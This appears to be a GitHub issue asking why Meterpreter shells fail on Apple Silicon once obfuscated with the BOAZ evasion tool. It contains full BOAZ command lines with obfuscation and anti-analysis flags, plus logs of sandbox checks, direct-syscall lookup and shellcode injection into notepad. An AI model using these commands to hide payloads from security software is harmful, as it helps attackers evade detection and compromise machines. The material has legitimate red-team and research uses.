ARM Architecture Affects #19
Description
Hello! I have a meterpreter payload that returns a shell when run on my apple silicon (ARM) VM. When I obfuscate with BOAZ the exe runs but I do not get a shell. Will being ran on apple silicon affect the obfuscation techniques?
These are the techniques I have tried:
- python3 Boaz.py -f /host_home/Boaz_beta/payload.exe -o ./output/boaz_output.exe -t donut -l 16 -e uuid -c akira
- python3 Boaz.py -f ~/testing_payloads/payload.exe -o ./boaz_output.exe -t donut -obf -l 1 -c pluto -e uuid
- python3 Boaz.py -f payload.exe -o output.exe -t donut -l 1 -c mingw -e uuid -obf -entropy 1 -a
here are some log examples:
- log from technique 3
Executing godFather...
God father check passed. Execution seems normal.
Executing godMother...
God mother check passed. Execution seems normal.
Time2 check passed. Execution seems normal.
Executing fs1...
Failed to create file for writing.
Executing fs2...
DLL check passed.
time3: No matrix detected. The counter reached the expected value.
Executing instrumentation9...
No instrumentation detected based on parent process name.
Executing network445...
Connected to port 445, no matrix detected.
Processor mask for NUMA node 0: 15
VirtualAllocExNuma succeeded
Getting processor mask for NUMA node 0: 15
Executable name is the same.
Most checks passed. Continuing execution.
[+] MagicCodePtr size: 8 bytes
[+] size of magiccode: 104992 bytes
First 8 bytes: e8 0a 38 01 00 0a 38 01
Last 8 bytes: 00 00 00 00 00 00 00 90
[+] Searching for syscall #1 in NtAllocateVirtualMemory @ 00007fff12898f60
[+] Found syscall #1 for NtAllocateVirtualMemory at 00007fff12898f72
[+] Found syscall number: 24
[+] press enter to allocate memory
[+] Alloca
- log for technique 1
[+] MagicCodePtr size: 8 bytes
[+] size of magiccode: 104992 bytes
[-] PID not provided
Notepad started with default settings.
[+] notepad PID: 9244
[+] Classic execution starts, all userland calls.
[+] Shellcode is located at: 000001e9aa220000
[-] magiccode execution wait failed